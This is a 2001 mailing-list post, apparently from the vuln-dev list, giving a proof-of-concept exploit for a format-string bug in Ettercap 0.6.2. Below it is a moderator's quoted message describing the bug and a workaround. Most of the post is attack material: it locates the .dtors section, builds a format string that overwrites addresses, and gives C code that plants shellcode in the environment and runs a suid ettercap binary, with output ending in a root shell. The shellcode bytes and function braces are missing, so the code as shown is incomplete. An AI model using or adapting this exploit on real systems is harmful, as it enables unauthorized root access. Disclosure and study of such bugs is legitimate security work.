Proof of concept for the format bug in Ettercap 0.6.2

From: BAILLEUX Christophe (
Date: 12/05/01

Date: Wed, 5 Dec 2001 12:25:00 +0100 (CET)
From: BAILLEUX Christophe <>
To: Blue Boar <>

 Firstly, let's retrieve the address of the section .dtors:

 cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap

 /usr/local/sbin/ettercap: file format elf32-i386

 Contents of section .dtors:
 8119a70 ffffffff 00000000 ........

 So the fmt string is composed of:

 - "000" for allignment.

 - "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we
    expect to write (here .dtors + 4 -- 0x8119a74.)

 - "%.49119x%16$hn%.16145x%15$hn" ret addr in shellcode.

 This format string was built using fmtbuilder:

 ---- ettercap-exp.c ----

 #include <stdio.h>
 #include <stdlib.h>

 int main()

         char buf[1024];

         char shellcode[] =
           /* setuid(0) */
           /* Aleph 1 shellcode */

         char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08%.49119x%16$hn%.16145x%15$hn";

         memset(buf, 0x90, 1024);
         memcpy(buf + 1024 - strlen(shellcode), shellcode, strlen(shellcode));

         setenv("SHELLCODE", buf, 1);

         execl("/usr/local/sbin/ettercap", "ettercap", fmt, 0x0);

 ---- ettercap-exp.c ----


 This demo is made with a suid root version.

 cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c
 cb@tshaw$ ./ettercap-exp

 ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...

 may the packets be with you...

 Invalid host address
 0000000000000000000000000000000000000000000000081020c0 !!

 sh-2.04# id
 uid=0(root) groups=100(users)

Best regards,

Christophe Bailleux - Network & System Security Engineer
Club-Internet / T-Online France
Voice:+33-(0)1-5545-4789 -

On Tue, 4 Dec 2001, Blue Boar wrote:

> Goobles sent another post to vuln-dev today, which was rejected due
> to personal attacks in their note. I want to check out their claim,
> however. If you want to see their original posting, it's on their
> web site like the others, I'm sure. It includes a claimed exploit,
> which cannot be posted due to their wishes that it not be separated
> from the advisory. If someone wants to write an independent exploit,
> I'd be happy to post that, provided it follows the list rules,
> of course.
> Here's the basic problem:
> ettercap %x%x%x%x%x%x%x
> ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
> may the packets be with you...
> Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !!
> Gobbles' point is that there is an option to configure it suid,
> so this could be exploitable when that is used. Why someone
> would want a packet capture program to be used by non-priv users..
> Well, I'm sure there's a good reason somewhere in the world.
> Is anyone using it that way? Are there OS distributions that come
> with Ettercap installed by default? And, of course, is it suid?
> (I can't imagine it would be.) The workaround is obvious, don't
> run it suid or allow remote users who do not already have a shell
> to execute it with a command-line parameter (such as via a web
> interface.)
> BB